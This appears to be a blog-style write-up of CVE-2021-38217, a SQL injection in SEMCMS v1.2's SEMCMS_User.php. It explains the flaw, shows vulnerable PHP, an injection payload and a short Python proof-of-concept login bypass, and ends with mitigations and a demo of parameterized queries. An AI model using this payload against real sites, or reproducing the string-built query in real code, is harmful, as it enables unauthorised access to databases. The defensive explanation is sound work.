In 2021, a serious security flaw, CVE-2021-38217, was discovered in the SEMCMS v1.2 CMS platform. This vulnerability allows anyone to perform a SQL Injection attack through the SEMCMS_User.php file. If you use SEMCMS, the bad news is that an attacker could use this bug to access or destroy your database with just a few keystrokes. Below, I’ll walk you through how this works, the details behind the bug, and some code snippets showing how simple it is to launch this exploit.
What is SQL Injection?
SQL Injection is a classic web application vulnerability where an attacker tricks the application into executing unintended SQL commands. This often happens when user input is added directly into a database query without being cleaned or validated first. The result? An attacker can read, modify, or even delete your database contents.
Where’s the Problem in SEMCMS?
The vulnerable spot is in the file SEMCMS_User.php. In version 1.2, user-supplied data is directly included in a SQL query without any filtering or escaping.
Let’s look at a (simplified) example of the problematic code inside SEMCMS_User.php:
// Example code inside SEMCMS_User.php
// Both values are taken verbatim from the POST body: no escaping, no placeholders
$user = $_POST['username'];
$pass = $_POST['password'];
// String interpolation puts the raw input inside the SQL text itself
$sql = "SELECT * FROM users WHERE username='$user' AND password='$pass'";
$result = mysqli_query($conn, $sql);
Here, variables $user and $pass come directly from user input. If someone submits malicious input, it becomes part of the SQL query.
If an attacker submits admin' OR '1'='1 as the username and anything as the password, the resulting SQL query becomes:
SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='anything'
Because '1'='1' is always true, the query will likely return all users, often logging the attacker in as the first admin user found.
But attackers can do more than just log in without a password. They can also read data, add new users, or delete tables.
Proof of Concept—Exploit Code
Here’s a simple example using Python and the requests library that demonstrates how easy it is to exploit this:
import requests

# "target.site" is the placeholder host used in the original post
url = 'http://target.site/SEMCMS_User.php'
# The username field carries the injected OR clause; the password is irrelevant
data = {
    'username': "admin' OR '1'='1",
    'password': "anything",
}
r = requests.post(url, data=data)
print("Login Status:", r.text)
This script just sends the malicious payload. If the site is unpatched, an attacker could log in as *any* user or even dump the database with more advanced queries.
References
- NVD - CVE-2021-38217
- Exploit Database EDB-ID: 50288
- OWASP - SQL Injection
The best way to protect your site
1. Use Prepared Statements: Instead of plugging user data directly in your SQL, use parameterized queries.
2. Always Validate User Input: Never trust what users enter.
3. Update SEMCMS: If you run v1.2, upgrade to the latest version or apply patches from the developer.
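As an added example (not SEMCMS code and not from the original post), here is a Python/sqlite3 model of the SEMCMS_User.php login logic: the string-built query from above next to a parameterized one that also applies the allowlist check from step 2, both run against the same payload the PoC uses. The users table, its single row and the SHA-256 password storage are constructed for the demonstration; the page's own code compares plaintext passwords.

```python
import hashlib
import re
import sqlite3

# Constructed stand-in for the SEMCMS users table (not real SEMCMS data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", hashlib.sha256(b"s3cret").hexdigest()))
    return conn

def login_vulnerable(conn, user, pw):
    # Mirrors SEMCMS_User.php: the request values are spliced into the SQL
    # text, so a quote in the username changes the query's structure.
    pw_hash = hashlib.sha256(pw.encode()).hexdigest()
    sql = (f"SELECT username FROM users "
           f"WHERE username='{user}' AND password='{pw_hash}'")
    return [row[0] for row in conn.execute(sql)]

# Step 2 of the mitigation list: allowlist the username format up front.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")

def login_fixed(conn, user, pw):
    # Step 1 of the mitigation list: bind values with placeholders, so the
    # database never parses the input as SQL.
    if not USERNAME_RE.match(user):
        return []
    pw_hash = hashlib.sha256(pw.encode()).hexdigest()
    rows = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (user, pw_hash),
    ).fetchall()
    return [row[0] for row in rows]

PAYLOAD = "admin' OR '1'='1"  # the same payload the PoC above sends

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload :", login_vulnerable(db, PAYLOAD, "anything"))
    print("fixed, payload      :", login_fixed(db, PAYLOAD, "anything"))
    print("fixed, real login   :", login_fixed(db, "admin", "s3cret"))
```

The injected OR clause lets the string-built query return the admin row without the password, while the parameterized query treats the whole payload as a username that does not exist.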
Conclusion
CVE-2021-38217 shows how dangerous SQL Injection can be and how easy it is to make mistakes in code. Even basic applications like SEMCMS v1.2 can leave the door wide open for hackers. If you use SEMCMS or any PHP application, check your code and patch all your input forms. One simple mistake might cost you your entire database!
Timeline
Published on: 10/28/2022 16:15:00 UTC
Last modified on: 10/28/2022 18:46:00 UTC